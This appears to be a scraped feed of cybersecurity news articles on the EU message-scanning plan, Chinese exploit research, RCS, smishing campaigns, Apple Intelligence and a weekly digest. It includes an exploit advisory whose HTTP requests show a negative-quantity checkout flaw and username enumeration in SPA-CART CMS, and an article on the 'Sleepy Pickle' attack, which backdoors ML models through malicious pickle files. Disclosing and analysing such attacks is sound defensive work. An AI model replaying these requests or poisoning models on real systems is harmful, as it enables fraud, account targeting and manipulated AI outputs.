A controversial proposal put forth by the European Union to scan users' private messages for detection child sexual abuse material (CSAM) poses severe risks to end-to-end encryption (E2EE), warned Meredith Whittaker, president of the Signal Foundation, which maintains the privacy-focused messaging service of the same name.
"Mandating mass scanning of private communications fundamentally

A controversial proposal put forth by the European Union to scan users' private messages for detection child sexual abuse material (CSAM) poses severe risks to end-to-end encryption (E2EE), warned Meredith Whittaker, president of the Signal Foundation, which maintains the privacy-focused messaging service of the same name.

"Mandating mass scanning of private communications fundamentally undermines encryption. Full Stop," Whittaker said in a statement on Monday.

"Whether this happens via tampering with, for instance, an encryption algorithm's random number generation, or by implementing a key escrow system, or by forcing communications to pass through a surveillance system before they're encrypted."

The response comes as law makers in Europe are putting forth regulations to fight CSAM with a new provision called "upload moderation" that allows for messages to be scrutinized ahead of encryption.

A recent report from Euractiv revealed that audio communications are excluded from the ambit of the law and that users must consent to this detection under the service provider's terms and conditions.

"Those who do not consent can still use parts of the service that do not involve sending visual content and URLs," it further reported.

Europol, in late April 2024, called on the tech industry and governments to prioritize public safety, warning that security measures like E2EE could prevent law enforcement agencies from accessing problematic content, reigniting an ongoing debate about balancing privacy vis-à-vis combating serious crimes.

It also called for platforms to design security systems in such a way that they can still identify and report harmful and illegal activity to law enforcement, without delving into the implementation specifics.

iPhone maker Apple famously announced plans to implement client-side screening for child sexual abuse material (CSAM), but called it off in late 2022 following sustained blowback from privacy and security advocates.

"Scanning for one type of content, for instance, opens the door for bulk surveillance and could create a desire to search other encrypted messaging systems across content types," the company said at the time, explaining its decision. It also described the mechanism as a "slippery slope of unintended consequences."

Signal's Whittaker further said calling the approach "upload moderation" is a word game that's tantamount to inserting a backdoor (or a front door), effectively creating a security vulnerability ripe for exploitation by malicious actors and nation-state hackers.

"Either end-to-end encryption protects everyone, and enshrines security and privacy, or it's broken for everyone," she said. "And breaking end-to-end encryption, particularly at such a geopolitically volatile time, is a disastrous proposition."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Signal Foundation Warns Against EU's Plan to Scan Private Messages for CSAM

With the requirement that all vulnerabilities first get reported to the Chinese government, once-private vulnerability research has become a goldmine for China's offensive cybersecurity programs.

Source: Zoonar GmbH via Alamy Stock Photo

China's cybersecurity experts over the past decade have evolved from hesitant participants in global capture-the-flag competitions, exploit contests, and bug bounty programs to dominant players in these arenas — and the Chinese government is applying those spoils toward stronger cyber-offensive capabilities for the nation.

In 2014, for example, Keen Team was the sole Chinese hacking group to take home a prize — scoring 13% of the purse — from the Pwn2Own exploit contest. But by 2017, seven China-based teams collected 79% of the prize money from the contest, according to data from the report, "From Vegas to Chengdu Hacking Contests, Bug Bounties, and China's Offensive Cyber Ecosystem," published last week. The following year, China banned participation in Western contests, gauging the vulnerability information too important to national security.

Its civilian hackers have directly benefited China's cyber-offensive programs and are one example of the success of China's cybersecurity pipeline, which the government created through its requirement that all vulnerabilities be directly reported to government authorities, says Eugenio Benincasa, senior researcher at the Center for Security Studies (CSS) at ETH Zurich, and the author of the report.

"By strategically positioning itself as the final recipient in the vulnerability disclosure processes of civilian researchers, the Chinese government leverages its civilian vulnerability researchers, among the best globally, on a large scale and at no cost," he says.

The open source intelligence report comes as the United States, Australia, Japan, South Korea, and other nations in the Asia-Pacific region have struggled to improve cyber defenses against Chinese advance persistent threat (APT) groups. Earlier this year, high-profile US government officials warned that China was compromising critical infrastructure to pre-position its military hackers for future conflicts. And, in the recently uncovered "Operation Crimson Palace," three different threat teams in China conducted coordinated attacks against a Southeast Asia government agency.

**A Robust Cyber Pipeline**

Starting with university capture-the-flag competitions and ending with exploits that enable military cyber operations, China's pipeline for training civilian hackers highlights the benefits of the country's focus on practical cybersecurity. China's cyber-offensive capability has also significantly benefited from the enforcement of its vulnerability disclosure rule, the Regulations on the Management of Security Vulnerabilities in Network Products (RMSV). Both programs are part of China's overall Military-Civil Fusion (MCF) initiative.

Flow chart showing the pipeline for cybersecurity expertise and vulnerability information. Source: ETH Zurich's "From Vegas to Chengdu Hacking Contests, Bug Bounties, and China’s Offensive Cyber Ecosystem" paper

Focusing its burgeoning numbers of technical graduates on finding vulnerabilities helps amplify its offensive capabilities, says Chris Wysopal, chief technology officer at software security firm Veracode.

"There is a scale difference there. ... They have a large number of technical graduates, and that is being harnessed to find vulnerabilities in \[Western products, such as\] Google Android," he says. "This shows that the incentives are working in their favor, and there's evidence of that."

Two groups of hackers exist within China's cyber-offensive ecosystems. The first group includes vulnerability researchers and offensive security specialists who have distinguished themselves by competing in bug bounty programs and hacking contests, such as the Pwn2Own contest and the Tianfu Cup, which was established as a China-based alternative to Pwn2Own.

The second group consists of the contracted or professional hackers who weaponize vulnerabilities for use in attacks on specific targets. Exploits developed by the first group have often been used by the second, a fact discussed in the iSoon leak earlier this year.

In the past, vulnerability research teams were typically associated with technical groups at large firms, such as Qihoo 360, which has at least 19 teams; the Ant Group, which hosts nine teams; and Tencent, which has at least seven research groups. Today, the researchers often are part of boutique cybersecurity firms.

China's civilian hackers initially obtained training by participating in Western capture-the-flag contests and exploit-development competitions, such as Pwn2Own, as well as bug bounty programs. China now has domestic versions of most of these initiatives and programs, often with the financial backing of top-tier national technical universities.

**Cybersecurity Superstars**

A handful of researchers have made significant contributions to China's programs, highlighting China's reliance on a small group of researchers, according to the report.

More than 50% of Google Android vulnerabilities, for example, are credited to Qihoo 360's Security Response Center (360 SRC), naming Han Zinuo as one of the contributors. When Zinuo moved to cybersecurity firm Oppo, 360 SRC's submissions dropped and Oppo's increased, the research paper stated. Similarly, another researcher, Yuki Chen, accounted for 68% of Qihoo 360's Vulcan researcher group's submissions to Microsoft, and when he moved to boutique firm Cyber Kunlun in 2020, the former firm saw a significant drop in vulnerabilities to Microsoft's bug bounty program, while the latter saw a surge.

Overall, the number of vulnerabilities reported by Chinese firms to the big three US software companies — Apple, Google, and Microsoft — declined starting in 2020. While this could suggest that Chinese firms were no longer reporting the vulnerabilities they discovered, it also coincided with increasing sanctions from the United States, such as the blacklisting of Qihoo 360 in May 2020 due to its links to the Chinese military, the report stated.

"This decrease \[in vulnerability reports has\] raised concerns about the potential loss of a significant channel for vulnerability reporting within the global ecosystem," the report said.

**Downsides for Defense**

Because Chinese teams have curtailed their participation in Western hacking competitions, they have arguably made the competitions less effective as a defensive strategy. In 2022 and 2023, for example, no teams attempted to hack either Apple's iPhone or Google's Pixel at the Pwn2Own competition — that was the first time in 15 years for Apple's iPhone — indicating that China now considers any exploits its experts find as too valuable to demonstrate publicly.

"The notable absence of Chinese hacking teams that specialized in targeting these devices explains this break far better than assuming that the iPhone and Pixel have become unbreachable," the research paper stated. "Concurrently, these vulnerabilities are highly likely evaluated by China's security agencies for potential use in cyber malicious operations."

Even showing such exploits without any accompanying details runs the risk of directing attackers to rediscover vulnerabilities, says Dustin Childs, head of threat awareness for the Zero Day Initiative at Trend Micro, which runs the Pwn2Own competition.

"They have already been demonstrated onstage, so threat actors know they aren’t wasting their time reversing a patch for some that may end up non-exploitable," he says. "This is why we invite vendors to participate in the contest."

Private organizations that deal in exploits act as a bellwether for the vulnerability market. Exploit seller Zerodium currently offers a $2.5 million payday for any hacker that finds a zero-click exploit chain for Google Android and $2 million for a similar attack on iOS.

**China's Own Hacking Competitions**

Meanwhile, China is further divorcing itself from the global information infrastructure, moving its infrastructure to domestically developed technology. Unsurprisingly, its cybersecurity pipeline is following suit, with some major exploit competitions focusing increasingly on Chinese products.

In the long term, China will have to follow two paths, Benincasa says.

"We are observing an interesting shift in China's hacking competitions toward focusing more on their own products, while at the same time maintaining a strong interest in Western ones," he says, adding, "China's strategic intent \[is\] to maintain a presence in international products for offensive purposes, given the expertise of its hackers in targeting Western products, while simultaneously focusing on domestic products for defensive purposes as it gradually reduces reliance on US vendors."

**About the Author(s)**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Bug Bounty Programs, Hacking Contests Power China's Cyber Offense

SPA-CART CMS version 1.9.0.6 suffers from business logic and user enumeration flaws.

# Exploit Title: Business Logic Flaw and Username Enumeration in  
spa-cartcmsv1.9.0.6  
# Date: 6/2024  
# Exploit Author: Andrey Stoykov  
# Version:  1.9.0.6  
# Tested on: Ubuntu 22.04  
# Blog:  
https://msecureltd.blogspot.com/2024/04/friday-fun-pentest-series-5-spa.html  
<http://msecureltd.blogspot.com/>

Description

- It was found that the application suffers from business logic flaw

- Additionally the application is vulnerable to username enumeration on the  
login page

Logic Flaw

Steps to Reproduce:

   1. Checkout page and intercept HTTP POST request  
   2. Add minus quantity such as -10  
   3. The final price would come up as negative value

// HTTP POST request modifying the quantity to negative value

POST /cart/add HTTP/2  
Host: demo.spa-cart.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/123.0.6312.122  
[...]

productid=225&amount=-10

// HTTP response

HTTP/2 200 OK  
Server: nginx  
[...]

[...]  
<img src="https://demo.spa-cart.com/var/photo/product/234x200/225/695/1.jpg"  
alt="" /><b>Five And Two Jewelry Piper Gold-Plated Earrings</b> added to  
cart  
<br /><br />  
<strong class="added_price">Price: <span><span  
class="currency">$</span>59.00</span></strong>  
<div class="added_options">  
<b>Selected options:</b>  
Qty: 1<br />  
Color: silver gold<br />  
</div>  
[...]

// HTTP GET request to checkout

GET /checkout HTTP/2  
Host: demo.spa-cart.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/123.0.6312.122  
[...]

// HTTP response showing negative amount owned

HTTP/2 200 OK  
Server: nginx  
[...]

[...]  
\t<td>silver gold<\/td>\r\n<\/tr>\r\n<\/table>\r\n <\/td>\r\n <td  
class=\"line\" nowrap align=\"right\">\r\n<span  
class=\"currency\">$<\/span>59.00 x -10 =  
<span class=\"currency\">$<\/span>-590.00 <\/td>  
[...]

Username Enumeration:

Steps to Reproduce:

   1. Register account  
   2. Enter valid account with wrong password  
   3. Trap HTTP request  
   4. Check that response for valid username has "P" message  
   5. Enter invalid account with wrong password  
   6. Check that response for invalid username has "E" message

// HTTP POST request with valid username and wrong password

POST /login HTTP/2  
Host: demo.spa-cart.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36  
[...]

email=test%40test.test&password=test123

// HTTP response showing "P" error message

HTTP/2 200 OK  
Server: nginx  
[...]

P

// HTTP POST request with invalid username and wrong password

POST /login HTTP/2  
Host: demo.spa-cart.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36  
[...]

email=test%40test.t3st&password=test123

// HTTP response showing "E" error message

HTTP/2 200 OK  
Server: nginx  
[...]

E

SPA-CART CMS 1.9.0.6 Username Enumeration / Business Logic Flaw

The messaging standard promises better security and cooler features than plain old SMS. Android has had it for years, but now iPhones are getting it too.

If you've been keeping up with all the news out of WWDC 2024 this week, you'll know that Apple is bringing the RCS (Rich Communication Services) messaging standard to iPhones later this year with iOS 18. That's a win for Google, which has long backed RCS on Android. But what actually is RCS? And why does supporting it matter?

The short version: It's an upgrade on the standard SMS/MMS texting standards that smartphones have been using from the start. It brings better support for all the cool features we're used to in our messaging apps, like read receipts and images, and it adds some extra security layers too.

Yes, it's a lot like using iMessage from Apple, or using WhatsApp—though it's not quite that simple. There's no RCS app you can install, but you can find apps that support the RCS standard, as we'll explain.

RCS is coming to iOS this year.

Courtesy of Apple

So the long version: Rich Communication Services is a fundamental standard rather than an app like WhatsApp, Signal, or Telegram. It requires carrier support to work, which is why adoption was slow in the beginning, though RCS now works across most countries and is supported by AT&T, Verizon, and T-Mobile.

SMS (Short Message Service) and MMS (Multimedia Messaging Service) weren't really built for the modern way that we communicate through our phones, and RCS tries to fix that. It adds or improves support for sharing large-resolution images and video, group chatting, read receipts, video calls, and messages that actually go beyond 160 characters.

When RCS is supported in your phone's default texting app, you can add reactions to messages, see when someone else is typing, and drop extra elements like GIFs, stickers, and your current location into conversations—all features you may well be used to and accept as standard in other apps.

There are changes and upgrades behind the scenes as well. Whereas SMS/MMS requires a data connection to your cellular network, RCS works over cell networks as well as Wi-Fi. If you don't have a cell signal for whatever reason but you can find a wireless network, your message can still go through.

RCS settings on a Pixel phone.

Courtesy of David Nield

The standard also brings end-to-end encryption with it. It means that no one else—not even Google or your carrier—can see the conversation that's taking place, because only the devices involved in the conversation have the keys necessary to decrypt it. End-to-end encryption is a security feature you should look for in any app that handles sensitive information, including communications.

It's a clear upgrade, which is why Google Messages and Samsung Messages now support it—the messaging apps you'll find on Pixel phones and Galaxy phones, respectively. In November 2023, Apple finally relented and agreed to support RCS on the iPhone in 2024, though this course correction perhaps had more to do with concerns about antitrust procedures than any newfound sense of camaraderie with Google.

Now we know that iPhone RCS support is going to arrive in September with iOS 18. This means all of those features we've mentioned—from read receipts to message reactions—will work inside the iOS Messages app. However, Android users are still going to show up as green bubbles, as the RCS standard isn't going to be fully integrated with the iMessage platform that Apple operates.

When you're texting someone with RCS enabled, you'll see "Text Message RCS" inside the text input box in Messages on iOS, indicating that the recipient can take advantage of all the modern messaging features that we're now used to. There's no need to turn RCS on or off—it's automatically enabled if you're chatting with a contact who has a device that supports RCS.

How RCS messages will look on an iPhone.

Courtesy of Apple

With iOS 18 still in its development stage, there might be changes to come for how RCS is handled on iPhones before the software is rolled out to all compatible devices later in the year. This version of iOS will work on any iPhone models launched in 2018 or later, so most Apple handsets currently in use will get the software and RCS.

It's the same with Samsung Messages: RCS is simply enabled when available. It's Google Messages for Android that gives you most control over RCS settings, and you can get to them from inside the app by tapping your profile picture (top right), then selecting **Messages settings**. Choose **RCS chats** and you're able to turn features such as read receipts and typing indicators on or off.

With RCS soon to appear on iPhones and now extensively supported on Android devices, it's going to become less and less likely that your phone will need to revert back to SMS—though it will do this if RCS isn't available for whatever reason. Otherwise, the standard that has powered our text messages since 1992 will finally be able to enjoy a well-earned retirement.

A Guide to RCS, Why Apple’s Adopting It, and How It Makes Texting Better

Pakistan has become the latest target of a threat actor called the Smishing Triad, marking the first expansion of its footprint beyond the E.U., Saudi Arabia, the U.A.E., and the U.S.
"The group's latest tactic involves sending malicious messages on behalf of Pakistan Post to customers of mobile carriers via iMessage and SMS," Resecurity said in a report published earlier this week. "The goal is

Pakistan has become the latest target of a threat actor called the Smishing Triad, marking the first expansion of its footprint beyond the E.U., Saudi Arabia, the U.A.E., and the U.S.

"The group's latest tactic involves sending malicious messages on behalf of Pakistan Post to customers of mobile carriers via iMessage and SMS," Resecurity said in a report published earlier this week. "The goal is to steal their personal and financial information."

The threat actors, believed to be Chinese-speaking, are known to leverage stolen databases sold on the dark web to send bogus SMS messages, enticing recipients into clicking on links under the pretext of informing them of a failed package delivery and urging them to update their address.

Users who end up clicking on the URLs are directed to fake websites that prompt them to enter their financial information as part of a supposed service fee charged for redelivery.

"Besides Pakistan Post, the group was also involved in detecting multiple fake delivery package scams," Resecurity said. "These scams primarily targeted individuals who were expecting legitimate packages from reputable courier services such as TCS, Leopard, and FedEx."

The development comes as Google revealed details of a threat actor it calls PINEAPPLE that employs tax and finance-themed lures in spam messages to entice Brazilian users into opening malicious links or files that ultimately lead to the deployment of the Astaroth (aka Guildma) information-stealing malware.

"PINEAPPLE often abuses legitimate cloud services in their attempts to distribute malware to users in Brazil," Google's Mandiant and Threat Analysis Group (TAG) said. "The group has experimented with a number of cloud platforms, including Google Cloud, Amazon AWS, Microsoft Azure and others."

It's worth noting that the abuse of Google Cloud Run to disseminate Astaroth was flagged by Cisco Talos earlier this February, describing it as a high-volume malware distribution campaign targeting users across Latin America (LATAM) and Europe.

The internet goliath said it also observed a Brazil-based threat cluster it tracks as UNC5176 targeting financial services, healthcare, retail, and hospitality sectors with a backdoor codenamed URSA that can siphon login credentials for various banks, cryptocurrency websites, and email clients.

The attacks leverage emails and malvertising campaigns as distribution vectors for a ZIP file containing an HTML Application (HTA) file that, when opened, drops a Visual Basic Script (VBS) responsible for contacting a remote server and fetching a second-stage VBS file.

The downloaded VBS file subsequently proceeds to carry out a series of anti-sandbox and anti-VM checks, after which it initiates communications with a command-and-control (C2) server to retrieve and execute the URSA payload.

A third Latin America-based financially motivated actor spotlighted by Google is FLUXROOT, which is linked to the distribution of the Grandoreiro banking trojan. The company said it took down phishing pages hosted by the adversary in 2023 on Google Cloud that impersonated Mercado Pago with the goal of stealing users' credentials.

"More recently, FLUXROOT has continued distribution of Grandoreiro, using cloud services such as Azure and Dropbox to serve the malware," it said.

The disclosure follows the emergence of a new threat actor dubbed Red Akodon that has been spotted propagating various remote access trojans like AsyncRAT, Quasar RAT, Remcos RAT, and XWorm through phishing messages that are designed to harvest bank account details, email accounts, and other credentials.

Targets of the campaign, which has been ongoing since April 2024, include government, health, and education organizations as well as financial, manufacturing, food, services, and transportation industries in Colombia.

"Red Akodon's initial access vector occurs mainly using phishing emails, which are used as a pretext for alleged lawsuits and judicial summonses, apparently coming from Colombian institutions such as the Fiscalía General de la Nación and Juzgado 06 civil del circuito de Bogotá," Mexican cybersecurity firm Scitum said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Grandoreiro Banking Trojan Hits Brazil as Smishing Scams Surge in Pakistan

A model can be perfectly innocent, yet still dangerous if the means by which it's packed and unpacked are tainted.

Source: Barry Mason via Alamy Stock Photo

Researchers have concocted a new way of manipulating machine learning (ML) models by injecting malicious code into the process of serialization.

The method focuses on the "pickling" process used to store Python objects in bytecode. ML models are often packaged and distributed in Pickle format, despite its longstanding, known risks.

As described in a new blog post from Trail of Bits, Pickle files allow some cover for attackers to inject malicious bytecode into ML programs. In theory, such code could cause any number of consequences — manipulated output, data theft, etc. — but wouldn't be as easily detected as other methods of supply chain attack.

"It allows us to more subtly embed malicious behavior into our applications at runtime, which allows us to potentially go much longer periods of time without it being noticed by our incident response team," warns David Brauchler, principal security consultant with NCC Group.

**Sleepy Pickle Poisons the ML Jar**

A so-called "Sleepy Pickle" attack is performed rather simply with a tool like Flicking. Flicking is an open source program for detecting, analyzing, reverse engineering, or creating malicious Pickle files. An attacker merely has to convince a target to download a poisoned .pkl — say via phishing or supply chain compromise — and then, upon deserialization, their malicious operation code executes as a Python payload.

Poisoning a model in this way carries a number of advantages to stealth. For one thing, it doesn't require local or remote access to a target's system, and no trace of malware is left to the disk. Because the poisoning occurs dynamically during deserialization, it resists static analysis. (A malicious model published to an AI repository like Hugging Face might be much more easily snuffed out.)

Serialized model files are hefty, so the malicious code necessary to cause damage might only represent a small fraction of the total file size. And these attacks can be customized in any number of ways that regular malware attacks are to prevent detection and analysis.

While Sleepy Pickle can presumably be used to do any number of things to a target's machine, the researchers noted, "controls like sandboxing, isolation, privilege limitation, firewalls, and egress traffic control can prevent the payload from severely damaging the user’s system or stealing/tampering with the user’s data."

More interestingly, attacks can be oriented to manipulate the model itself. For example, an attacker could insert a backdoor into the model, or manipulate its weights and, thereby, its outputs. Trail of Bits demonstrated in practice how this method can be used to, for example, suggest that users with the flu drink bleach to cure themselves. Alternatively, an infected model can be used to steal sensitive user data, add phishing links or malware to model outputs, and more.

**How to Safely Use ML Models**

To avoid this kind of risk, organizations can focus on only using ML models in the safer file format, Safetensors. Unlike Pickle, Safetensors deals only with tensor data, not Python objects, removing the risk of arbitrary code execution deserialization.

"If your organization is dead set on running models that are out there that have been distributed as a pickled version, one thing that you could do is upload it into a resource safe sandbox — say, AWS Lambda — and do a conversion on the fly, and have that produce a Safetensors version of the file on your behalf," Brauchler suggests.

But, he adds, "I think that's more of a Band-Aid on top of a larger problem. Sure, if you go and download a Safetensors file, you might have some amount of confidence that that doesn't contain malicious code. But do you trust that the individual or organization that produced this data generated a machine learning model that doesn't contain things like backdoors or malicious behavior, or any other number of issues, oversights, or malice, that your organization isn't prepared to handle?"

"I think that we really need to be paying attention to how we're managing trust within our systems," he says, and the best way of doing that is to strictly separate the data a model is retrieving from the code it uses to function. "We need to be architecting around these models such that even if they do misbehave, the users of our application and our assets within our environments are not impacted."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

'Sleepy Pickle' Exploit Subtly Poisons ML Models

The company focused heavily on data and system security in the announcement of its generative AI platform, Apple Intelligence, but experts worry that companies will have little visibility into data security.

Source: Cosmo Condina via Alamy Stock Photo

Apple's long-awaited announcement of its generative AI (GenAI) capabilities came with an in-depth discussion of the company's security considerations for the platform. But the tech industry's past focus on harvesting user data from nearly every product and service have left many concerned over the data security and privacy implications of Apple's move. Fortunately, there are some proactive ways that companies can address potential risks.

Apple's approach to integrating GenAI — dubbed Apple Intelligence — includes context-sensitive searches, editing emails for tone, and the easy creation of graphics, with Apple promising that the powerful features require only local processing on mobile devices to protect user and business data. The company detailed a five-step approach to strengthen privacy and security for the platform, with much of the processing done on a user's device using Apple Silicon. More complex queries, however, will be sent to the company's private cloud and use the services of OpenAI and its large language model (LLM).

While companies will have to wait to see how Apple's commitment to security plays out, the company has put a lot of consideration into how GenAI services will be handled on devices and how the information will be protected, says Joseph Thacker, principal AI engineer and security researcher at AppOmni, a cloud-security firm.

"Apple's focus on privacy and security in the design is definitely a good sign," he says. "Features like not allowing privileged runtime access and preventing user targeting show they are thinking about potential abuse cases."

Apple spent significant time during its announcement reinforcing the idea that the company takes security seriously, and published a paper online that describes the company's five requirements for its Private Cloud Compute service, such as no privileged runtime access and hardening the system to prevent targeting specific users.

Still, large language models (LLMs), such as ChatGPT, and other forms of GenAI are new enough that the threats remain poorly understood, and some will slip through Apple's efforts, says Steve Wilson, chief privacy officer at cloud security and compliance provider Exabeam, and lead on the Open Web Application Security Project's Top 10 Security Risks for LLMs.

"I really worry that LLMs are a very, very different beast, and traditional security engineers, they just don't have experience with these AI techniques yet," he says. "There are very few people who do."

**Apple Makes Security a Centerpiece**

Apple seems to be aware of the security risks that concern its customers, especially businesses. The implementation of Apple Intelligence across a user's devices, dubbed the Personal Intelligence System, will connect data from applications in a way that has, perhaps, only been implemented through the company's health-data services. Conceivably, every message and email sent from a device could be reviewed by AI and context added through on-device semantic indexes.

Yet, the company pledged that, in most cases, the data never leaves the device, and the information is anonymized as well.

"It is aware of your personal data, without collecting your personal data," Craig Federighi, senior vice president of software engineering at Apple, stated in a four-minute video on Apple Intelligence and privacy during the company's June 10 launch, adding: "You are in control of your data, where it is stored and who can access it."

When it does leave the device, data will be processed in the company's Private Cloud Compute service, so Apple can take advantage of more powerful server-based generative-AI models, while still protecting privacy. The company says that it never stores or makes accessible any data to Apple. In addition, Apple will make every production build of its Private Cloud Compute platform available to security researchers for vulnerability research in conjunction with a bug-bounty program.

Such steps seemingly go beyond what other companies have promised and should assuage the fears of enterprise security teams, AppOmni's Thacker says.

"This type of transparency and collaboration with the security research community is important for finding and fixing vulnerabilities before they can be exploited in the wild," he says. "It allows Apple to leverage the diverse skills and perspectives of researchers to really put the system through the wringer from a security testing perspective. While it's not a guarantee of security, it will help a lot."

**There's an App for (Leaking) That**

However, the interactions between apps and data on mobile devices and the behavior of LLMs may be too complex to fully understand at this point, says Exabeam's Wilson. The attack surface area of LLMs continues to surprise the large companies behind the major AI models. Following its release of its latest Gemini model, for example, Google had to contend with inadvertent data poisoning that arose from training its model with untrusted data.

"Those search components are falling victim to these kind of indirect injection data-poisoning incidents, where they're off telling people to eat glue and rocks," Wilson says. "So it's one thing to say, 'Oh, this is a super-sophisticated organization, they'll get this right,' but Google's been proving over and over and over again that they won't."

Apple's announcement comes as companies are quickly experimenting with ways to integrate GenAI into the workplace to improve productivity and automate traditionally tough-to-automate processes. Bringing the features to mobile devices has happened slowly, but now, Samsung has released its Galaxy AI, Google has announced the Gemini mobile app, and Microsoft has announced Copilot for Windows.

While Copilot for Windows is integrated with many applications, Apple Intelligence appears to go beyond even Microsoft's approach.

**Think Different (About Threats)**

Overall, companies need to first gain visibility into their employees' use of LLMs and other GenAI. While they do not need to go to the extent of billionaire tech innovator Elon Musk, a former investor in OpenAI, who raised concerns that Apple — or OpenAI — would abuse users' data or fail to secure business information and pledged to ban iPhones at his companies, chief information security officers (CISOs) certainly should have a discussion with their mobile device management (MDM) providers, Exabeam's Wilson says.

Right now, controls to regulate data going into and out of Apple Intelligence do not appear to exist and, in the future, may not be accessible to MDM platforms, he says.

"Apple has not historically provided a lot of device management, because they are leaned in on personal use," Wilson says. "So it's been up to third parties for the last 10-plus years to try and build these third-party frameworks that allow you to install controls on the phone, but it's unclear whether they're going to have the hooks into \[Apple Intelligence\] to help control it."

Until more controls come online, enterprises need to set a policy, and to find ways to integrate their existing security controls, authentication systems, and data loss prevention tools with AI, says AppOmni's Thacker.

"Companies should also have clear policies around what types of data and conversations are appropriate to share with AI assistants," he says. "So while Apple's efforts help, enterprises still have work to do to fully integrate these tools securely."

**About the Author(s)**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Apple Intelligence Could Introduce Device Security Risks

Our collection of the most relevant reporting and industry perspectives for those guiding cybersecurity strategies and focused on SecOps. Also included: Rockwell's dire ICS warning; a red alert on biometrics; cybersecurity for the Hajj season.

Welcome to CISO Corner, Dark Reading's weekly digest of articles tailored specifically to security operations readers and security leaders. Every week, we'll offer articles gleaned from across our news operation, The Edge, DR Technology, DR Global, and our Commentary section. We're committed to bringing you a diverse set of perspectives to support the job of operationalizing cybersecurity strategies, for leaders at organizations of all shapes and sizes.

**In this issue of CISO Corner:**

*   Apple's AI Offering Makes Big Privacy Promises
    
*   Scores of Biometrics Bugs Emerge, Highlighting Authentication Risks
    
*   DR Global: Governments, Businesses Tighten Cybersecurity Around Hajj Season
    

*   Why CIO & CISO Collaboration Is Key to Organizational Resilience
    
*   Rockwell's ICS Directive Comes as Critical Infrastructure Risk Peaks
    
*   4 Ways to Help a Security Culture Thrive
    

Don't miss "Anatomy of a Data Breach: What to Do if It Happens to You," a free Dark Reading virtual event scheduled for June 20! Speakers include Verizon's Alex Pinto, plus execs from Snowflake, pharma giant GSK, Salesforce, and more — register today!

**Apple's AI Offering Makes Big Privacy Promises**

By Agam Shah, Contributing Writer, Dark Reading

Apple's guarantee of privacy on every AI transaction — whether on-device or cloud — is ambitious and could influence trustworthy AI deployments on device and in the cloud, analysts say.

Apple's announcement of Apple Intelligence and plans to integrate AI across its devices and applications comes with a commitment to guarantee privacy on every AI transaction. This sets a high bar on zero-trust infrastructure that competitors may try to match.

Because of Apple's walled garden model, rival providers don’t have nearly the same level of control over their AI infrastructure. Unlike Apple, they can’t lock down security as queries pass through various hardware and software layers. For example, OpenAI and Microsoft process queries through GPUs from Nvidia, which handles vulnerability discovery and patching.

“If Apple sets the standard, the effect will be 'why I should buy Android if I don’t care about the privacy,'" says Alex Matrosov, CEO of security company Binarly.io. "The next step will be Google following up and trying to maybe implement or do the similar thing."

Read more: Apple's AI Offering Makes Big Privacy Promises

Related: OpenAI Forms Another Safety Committee After Dismantling Prior Team

**Scores of Biometrics Bugs Emerge, Highlighting Authentication Risks**

By Nate Nelson, Contributing Writer, Dark Reading

Face scans stored like passwords inevitably will be compromised, like passwords are. But there's a crucial difference between the two that organizations can rely on when their manufacturers fail.

Biometric security is more popular today than ever, with widespread adoption in the public sector — law enforcement, national ID systems, etc. — as well as for commercial industries like travel and personal computing. In Japan, subway riders can "pay by face," and Singapore's immigration system relies on face scans and thumbprints to allow travelers into the country. The fact that even burger places are experimenting with face scans suggests something's brewing here.

But researchers have found two dozen vulnerabilities in a biometric terminal used in critical facilities worldwide could allow hackers to gain unauthorized access, manipulate the device, deploy malware, and steal biometric data, which highlights the risks that come with implementing these systems.

The critical nature of the environments in which these systems are so often deployed necessitates that organizations go above and beyond to ensure their integrity. And that job takes much more than just patching newly discovered vulnerabilities.

Read more: Scores of Biometrics Bugs Emerge, Highlighting Authentication Risks

Related: Biometric Bypass: BrutePrint Makes Short Work of Fingerprint Security

**Global: Governments, Businesses Tighten Cybersecurity Around Hajj Season**

By Robert Lemos, Contributing Writer, Dark Reading

While cyberattacks drop slightly during the week of the Islamic pilgrimage, organizations in Saudi Arabia and other countries with large Muslim populations see attacks on the rise.

The final month of the Islamic calendar, Dhu al-Hijjah, began on June 7, marking the countdown for millions of Muslims to the Hajj pilgrimage, and also a time when cybercriminals and cyber-espionage actors see increased opportunity amid reduced vigilance and slimmed staffing.

While many of the cyberattacks are focused on pilgrims as consumers of travel services, a variety of businesses — from banks to e-commerce sites — are at greater risk of data theft and denial-of-service attacks, according to experts. On June 3, for example, cyber-threat actors announced a data leak on an underground forum that allegedly contained the personal information of 168 million users from "The Hajj and Pilgrimage Organization in Iran," according to cybersecurity firm Kaspersky.

The attacks highlight the two aspects of how cyberattackers see the Hajj season: as an opportunity to take advantage of pilgrims, but also as a time of reduced resources for security teams, making business and government agencies vulnerable.

Read more: Governments, Businesses Tighten Cybersecurity Around Hajj Season

Related: 'DuneQuixote' Shows Stealth Cyberattack Methods Are Evolving. Can Defenders Keep Up?

